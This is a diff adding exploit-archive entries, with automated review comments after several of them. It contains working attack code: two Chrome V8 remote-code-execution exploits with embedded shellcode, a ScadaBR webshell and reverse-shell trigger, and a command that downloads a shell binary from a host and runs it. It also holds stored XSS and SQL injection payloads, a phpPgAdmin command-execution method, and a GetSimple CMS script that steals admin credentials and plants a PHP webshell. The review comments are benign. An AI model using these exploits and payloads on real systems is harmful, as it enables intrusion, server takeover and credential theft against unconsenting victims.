+			
+		    burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
+		    burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
+		    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+		    r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
+		    time.sleep(5)
+		    
+		    if len(r.text) > 401:
+		        print('[+] Connection received')
+		        sys.exit(0)
+	       	    else:
+                        print('[x] Failed to receive reverse connection ...\n')    			
+
+		elif num == 999:
+                    print('[x] Failed to found Webshell ... ')
+                    
+	else:
+	    print('Reason:'+getdata.reason+' ')	   
+	    print('Exploit Failed x_x')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
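Review bot: The header does not describe the underlying flaw or its fix, so the script can only be understood by reading the multipart body. From that body, `view_edit.shtm` accepts a file named `webshell.jsp` in the `backgroundImageMP` field under a declared `Content-Type: image/png`, and the later loop finds it served as `/ScadaBR/uploads/<n>.jsp`, which means uploads land in a web path where JSP is executed and under a predictable numeric name. A header comment should state that together with the mitigation (server-side validation of extension and content, uploads stored where JSP is not executed) and the log indicators (`.jsp` files under `uploads/`, a run of sequential `GET /ScadaBR/uploads/N.jsp` requests). Separately, the `#!/usr/bin/python` line sits below the header comments where it has no effect, and the body mixes `print "..."` statements with `print(...)` calls, so the intended interpreter should be stated in a comment.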
diff --git a/exploits/multiple/remote/49745.js b/exploits/multiple/remote/49745.js
new file mode 100644
index 000000000..da4ccf84d
--- /dev/null
+++ b/exploits/multiple/remote/49745.js
@@ -0,0 +1,111 @@
+# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
+# Date: 05/04/2021
+# Exploit Author: Tobias Marcotto
+# Original Author: r4j0x00
+# Tested on: Kali Linux x64 
+# Version: 87.0.4280.88
+# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+# CVE: CVE-2020-16040
+# Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
+
+*********************************************************************************************************
+
+
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+    f64_buf[0] = val;
+    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+    u64_buf[0] = Number(val & 0xffffffffn);
+    u64_buf[1] = Number(val >> 32n);
+    return f64_buf[0];
+}
+
+function foo(a) {
+  var y = 0x7fffffff;
+
+  if (a == NaN) y = NaN;
+  if (a) y = -1;
+
+  let z = y + 1;
+  z >>= 31;
+  z = 0x80000000 - Math.sign(z|1);
+
+  if(a) z = 0;
+
+  var arr = new Array(0-Math.sign(z));
+  arr.shift();
+  var cor = [1.1, 1.2, 1.3];
+
+  return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+    foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+    arr[idx+1] = k;
+    return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+    cor[0] = itof(k);
+    return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+    let dataview = new DataView(buf2);
+    let buf_addr = addrof(buf2);
+    let backing_store_addr = buf_addr + 0x14n;
+    arbwrite(backing_store_addr, addr);
+
+    for (let i = 0; i < shellcode.length; i++) {
+        dataview.setUint32(4*i, shellcode[i], true);
+    }
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];
+/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode
+copy_shellcode(rwx_page_addr, shellcode);
+f();
\ No newline at end of file
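Review bot: The header is internally inconsistent about versions: the title names Chrome 86.0.4240 while `# Version:` gives 87.0.4280.88, which the description identifies as the release that fixed the issue rather than an affected one. Splitting the field into `Affected: prior to 87.0.4280.88` and `Fixed: 87.0.4280.88` would make the remediation (update Chrome) explicit. `u64_buf` is a `Uint32Array`, so the name misleads; `u32_buf` would match how `ftoi` and `itof` combine two 32-bit halves. The active `shellcode` array carries no comment saying what it does, unlike the commented-out one marked `// windows shellcode`, and a one-line description would let a reviewer assess the payload without executing it.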
diff --git a/exploits/multiple/remote/49746.js b/exploits/multiple/remote/49746.js
new file mode 100644
index 000000000..1f59d0927
--- /dev/null
+++ b/exploits/multiple/remote/49746.js
@@ -0,0 +1,146 @@
+# Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution
+# Date: 05/04/2021
+# Exploit Author: Tobias Marcotto
+# Original Author: r4j0x00
+# Tested on: Kali Linux x64 
+# Version: 83.0.4103.106
+# Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+# CVE: CVE-2020-6507
+
+
+*********************************************************************************************************
+
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+
+var arraybuf = new ArrayBuffer(0x13373);
+var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);
+var mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(mod);
+var shell = wasm_instance.exports.shell;
+var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];
+
+var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]);
+
+function ftoi(val) {
+         f64_buf[0] = val;
+         return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+function itof(val) {
+         u64_buf[0] = Number(val & 0xffffffffn);
+         u64_buf[1] = Number(val >> 32n);
+         return f64_buf[0];
+}
+
+array = Array(0x40000).fill(1.1);
+args = Array(0x100 - 1).fill(array);
+args.push(Array(0x40000 - 4).fill(2.2));
+giant_array = Array.prototype.concat.apply([], args);
+giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
+
+length_as_double =
+    new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];
+
+function trigger(array) {
+  var x = array.length;
+  x -= 67108861;
+  x = Math.max(x, 0);
+  x *= 6;
+  x -= 5;
+  x = Math.max(x, 0);
+
+  let corrupting_array = [0.1, 0.1];
+  let corrupted_array = [0.1];
+
+  corrupting_array[x] = length_as_double;
+  return [corrupting_array, corrupted_array];
+}
+
+for (let i = 0; i < 30000; ++i) {
+  trigger(giant_array);
+}
+
+corrupted_array = trigger(giant_array)[1];
+
+var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
+function searchmem(value)
+{
+	skip = 0;
+	for(i=0; i<search_space.length; ++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+			{
+				if(skip++ == 2) // Probably the first two are due to the search itself
+					return j;
+			}
+		}
+	}
+	return -1;
+}
+
+function searchmem_full(value)
+{
+	for(i=0;i<search_space.length;++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if((ftoi(corrupted_array[j]) === value))
+			{
+				if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+				{
+					return j;
+				}
+			}
+		}
+	}
+	return -1;
+}
+
+var arraybuf_idx = searchmem(0x13373n);
+if(arraybuf_idx == -1)
+{
+	alert('Failed 1');
+	throw new Error("Not found");
+}
+document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");
+function arb_read(addr, length)
+{
+	var data = [];
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	for(i=0;i<length;++i)
+		data.push(u8_arraybuf[i]);
+	return data;
+}
+
+function arb_write(addr, data)
+{
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	for(i=0;i<data.length;++i)
+		u8_arraybuf[i] = data[i];
+}
+
+idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));
+if (idx == -1)
+{
+	alert('Failed 2');
+	throw new Error("Not found");
+}
+
+wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
+document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+	rwx_addr >>= 32n;
+	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
+arb_write(rwx_addr, shellcode);
+shell();
\ No newline at end of file
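Review bot: The header of this new file gives two different affected versions: the title line says `Google Chrome 81.0.4044`, while the `# Version:` and `# Description:` lines say 83.0.4103.106 and "prior to 83.0.4103.106". A reader triaging CVE-2020-6507 cannot tell from this which builds the entry covers. The header lines also start with `#` and are followed by a row of asterisks, neither of which is a JavaScript comment, so the metadata is not set apart from the script in the file's own syntax. I would state the range once, for example `// Affected: Google Chrome prior to 83.0.4103.106 (CVE-2020-6507)`, and write the rest of the header as `//` comments.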
diff --git a/exploits/multiple/webapps/49383.py b/exploits/multiple/webapps/49383.py
index 3e689dfde..11da08305 100755
--- a/exploits/multiple/webapps/49383.py
+++ b/exploits/multiple/webapps/49383.py
@@ -32,7 +32,7 @@ PASSWORD = "password123"
 HOST_ADDR = '192.168.1.1'
 HOST_PORT = 3000
 URL = 'http://192.168.1.2:3000'                                                                                                                                                                          
-CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'                                                                                                             
+CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'                                                                                                             
                                                                                                                                                                                                              
 # Login                                                                                                                                                                                                      
 s = requests.Session()                                                                                                                                                                                       
diff --git a/exploits/multiple/webapps/49727.txt b/exploits/multiple/webapps/49727.txt
new file mode 100644
index 000000000..deb0fcf46
--- /dev/null
+++ b/exploits/multiple/webapps/49727.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
+# Date: 3/30/2021
+# Exploit Author: cmOs
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.9
+# Tested on Ubuntu 20.04
+
+Step 1: Log in to the dashboard using the Administrator account
+Step 2: Go to Listeners > Summary > Actions (View) > Edit
+Step 3: Inject XSS_Payload to "Notes" parameter
+Step 4: Graceful Restart
+Step 5: Trigger XSS when Administrator click on Default Icon
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: 127.0.0.1:7080
+Connection: close
+Content-Length: 163
+sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
+LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
+
+name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49731.txt b/exploits/multiple/webapps/49731.txt
new file mode 100644
index 000000000..1605f01f0
--- /dev/null
+++ b/exploits/multiple/webapps/49731.txt
@@ -0,0 +1,26 @@
+# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: http://sourceforge.net/projects/coursems
+# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
+# Version: 2.1
+# Tested on: Ubuntu 20.04
+
+POST /coursems/admin/add_jobs.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/coursems/admin/add_jobs.php
+Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
+Upgrade-Insecure-Requests: 1
+
+name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
+
+
+Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49733.txt b/exploits/multiple/webapps/49733.txt
new file mode 100644
index 000000000..0231811d9
--- /dev/null
+++ b/exploits/multiple/webapps/49733.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: https://sourceforge.net/projects/latrix
+# Software Link: https://sourceforge.net/projects/latrix/files/latest/download
+# Version: 0.6.0
+# Tested on: Ubuntu 20.04
+
+POST /latrix/inandout.php HTTP/1.1
+Host: 18.222.194.190
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+Origin: http://18.222.194.190
+Connection: close
+Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout
+Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1
+Upgrade-Insecure-Requests: 1
+
+txtaccesscode=111&btnsubmit=Submit
+
+
+
+Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode
+
+
+Output
+----------------snip----------------
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: txtaccesscode (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit
+
+    Type: error-based
+    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
+    Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 22 columns
+    Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit
+---
+[16:29:27] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
+web application technology: Apache 2.4.41
+back-end DBMS: MySQL >= 5.6
\ No newline at end of file
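Review bot: The captured request names a publicly routable address, 18.222.194.190, on its `Host:`, `Origin:` and `Referer:` lines, together with a `PHPSESSID` value, whereas the other write-ups in this commit use `localhost` or private ranges. If that was a temporary test instance, the address may since belong to an unrelated party, so it should be replaced before publication, e.g. `Host: localhost`. The sqlmap command reads `bam.txt` without saying that this is the saved request shown above; one sentence stating so would close the gap. The write-up also gives no fix guidance: the output indicates `txtaccesscode` reaches a MySQL query unescaped, which a parameterized query in `inandout.php` would presumably address.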
diff --git a/exploits/multiple/webapps/49736.txt b/exploits/multiple/webapps/49736.txt
new file mode 100644
index 000000000..300d9ee2c
--- /dev/null
+++ b/exploits/multiple/webapps/49736.txt
@@ -0,0 +1,15 @@
+# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
+# Date: 29/03/2021
+# Exploit Author: Valerio Severini
+# Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0
+# Version: 7.13.0 or lower
+# Tested on: Debian 10 and Ubuntu
+
+Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement.
+
+Attack Vectors (PoC):
+1) you have to create a table manually and call it "cmd_exec" with 1 column
+2) add cmd_output and type = text
+3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement.
+4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; "
+5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; "
\ No newline at end of file
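Review bot: The text never states which database privilege the logged-in account needs, and that decides who is actually exposed. In PostgreSQL, `COPY ... FROM PROGRAM` is limited to superusers and, in newer releases, members of `pg_execute_server_program`, so the impact depends on the role phpPgAdmin connects with. I would add a line such as `# Prerequisite: the authenticated database role must be permitted to run COPY ... FROM PROGRAM` and note that connecting with a non-superuser role limits the issue. Two smaller points: the column is called `cmd_out` in the Description but `cmd_output` in step 2, and the `# Vendor Homepage:` line has the `Software Link:` label fused into it.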
diff --git a/exploits/php/webapps/49726.py b/exploits/php/webapps/49726.py
new file mode 100755
index 000000000..077a67b59
--- /dev/null
+++ b/exploits/php/webapps/49726.py
@@ -0,0 +1,125 @@
+# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: March 29th, 2021
+# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/
+# Version: v3.3.16
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
+# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
+
+#  Vulnerability Description:
+#  GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 #  via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
+#  Exploit Description:
+#  This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation #  attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
+#  Attack Chain:
+#  1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
+#  2. Admin then enters their credentials into the GetSimple CMS login portal
+#  3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
+#  4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
+#  5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
+#  6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
+#  7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
+#  8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
+
+import sys,re,argparse,requests
+from urllib.parse import quote
+from colorama import (Fore as F, Back as B, Style as S)
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+    C=FB if color == 'B' else FR if color == 'R' else FG 
+    return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
+
+def webshell(SERVER_URL):
+    try:
+        WEB_SHELL = SERVER_URL
+        getdir  = {'FierceGodKick': 'echo %CD%'}
+        r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r.status_code
+        cwd = re.findall(r'[CDEF].*', r.text)
+        if cwd:
+            cwd = cwd[0]+"> "
+            term = SB+FG+cwd+FT
+            print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+'     WELCOME BOKU     '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
+            while True:
+                thought = input(term)
+                command = {'FierceGodKick': thought}
+                r = requests.post(WEB_SHELL, data=command, verify=False)
+                status = r.status_code
+                if status != 200:
+                    r.raise_for_status()
+                response = r.text
+                print(response)
+        else:
+            r.raise_for_status()
+    except:
+        pass
+
+def urlEncode(javascript):
+    return quote(javascript)
+
+def genXssPayload():
+    XSS_PAYLOAD = '/index/javascript:'
+    XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
+    XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
+    XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
+    XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
+    XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
+    XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
+    XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
+    XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
+    XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
+    XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
+    XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
+    XSS_PAYLOAD += 'r=this.responseXML;'
+    XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
+    XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
+    XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
+    XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
+    XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+    XSS_PAYLOAD += 'xhr3.send(params);'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
+    XSS_PAYLOAD += 'xhr2.responseType="document";'
+    XSS_PAYLOAD += 'xhr2.send();'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr1.send(params);'
+    XSS_PAYLOAD += '%2f%2f'
+    return XSS_PAYLOAD
+
+def argsetup():
+    about  = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+    args = parser.parse_args()
+    return args
+
+if __name__ == "__main__":
+    print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
+    print(SB+FR+'         CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
+    print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
+    args = argsetup()
+    RHOST = args.TargetSite
+    WEBAPP_URL = RHOST+'/admin/'
+    WEBAPP_URL = WEBAPP_URL+'index.php'
+    PAYLOAD = genXssPayload()
+    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
